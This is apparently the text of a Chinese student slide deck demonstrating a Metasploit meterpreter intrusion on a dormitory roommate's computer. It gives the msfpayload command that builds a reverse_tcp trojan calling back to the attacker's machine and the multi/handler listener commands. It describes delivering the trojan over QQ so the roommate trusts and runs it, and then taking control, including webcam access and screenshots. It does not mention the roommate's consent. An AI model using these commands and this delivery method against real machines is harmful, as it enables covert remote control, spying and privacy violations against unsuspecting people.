meterpreter内网主机渗透.ppt

metasploit 渗透测试神器 演示所用为meterpreter，里面的一个扩展工具 特色： 功能强大：一上线可快速提权（administrator，root） 网络嗅探 网络中继（跳板，入侵A主机后利用A主机入侵B主机） 网页监控桌面（通过命令打开3389端口，进行监控） 截图 （因为做的是简单测试，所以只是简单演示入侵后的命令） 利用虚拟机渗透宿舍内舍友主机 舍友IP：172.17.73.144 虚拟机IP：172.17.73.60 因为技术水平不高，生产出来的木马会报毒。 所以在没有杀毒软件的环境下成功率比较高。 开始渗透 打开虚拟机，运行msfpayload生成木马程序 命令如下: msfpayload windows/meterpreter/reverse_tcp lhost=172.17.73.60 lport=4444 x /root/Desktop/test.exe 编译生成木马程序 右键属性》权限》允许程序意EXE程序运行 可以通过编程工具看里面的代码，收益匪浅。 运行metasploit 输入:msfconsole 运行过程比一般的linux程序要久，第一次运行长达5分多钟。 运行成功后如下图 每次运行都出现不同的图案 输入命令 use exploit/multi/handler set lhost 172.17.73.60 set lport 4444 exploit 发送木马到目标等待运行 技术水平不高，只能通过qq发送运行（报木马了），信任运行。 等待主机运行程序 主机上线 进入meterpreter程序 输入?查看帮助列表 meterpreter 主机上线后可以监控，获得控制权，远程桌面会报木马，能调用摄像头，截图主机桌面等等 * *